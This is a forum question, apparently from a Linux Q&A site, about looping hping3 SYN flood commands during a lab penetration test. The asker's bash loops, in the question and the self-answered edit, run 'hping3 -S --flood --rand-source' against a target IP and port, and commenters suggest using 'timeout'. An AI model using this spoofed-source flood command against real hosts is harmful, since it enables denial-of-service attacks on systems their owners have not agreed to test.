# How can I conduct Syn flood attack with incremental packet size using hping3

Tags: linux, networking, penetration-testing, hping

I am conducting penetration testing. I am trying to increment the packet number without manually exit outing the ping and pinging again. I tried with "sleep 5," but the ping doesn't end after 5 seconds. I have to do ^C and then the incremental command executes. Any suggestion? My host and attacker are in a separate virtual machine.

```
for i in {1..10000}; do sudo hping3 -c $i -d 120 -S -w 64 -p <port_number>--flood --rand-source <ip_address> --traceroute; date ; sleep 5;done
```

Edit: For those who are facing the same problem- use timeout  
For my case: for i in {1..1000}; do sudo timeout 60 hping3 -c $i -d 120 -S -w 64 -p 80 --flood --rand-source 192.168.189.135 --tr-stop; date ; sleep 1;done.

Comment: `sleep 5` sleeps 5 seconds between calls to `hping3`, it doesn't put a timeout on it.

Comment: You say you're trying to increment the packet size, but you have `-d 120`. That uses the same packet size every time.

Comment: Use the `timeout` command to run `hping3` with a timeout.

Comment: There doesn't seem to be a way to change the packet size within a single use of `hping3`. You need to start it over with a different `-d` option.

Comment: I am sorry, I am trying to increment the packet number

Comment: If you want to do multiple counts without starting over, just add the counts. `-c 10` followed by `-c 11` is the same as `-c 21`.

Comment: timeout worked!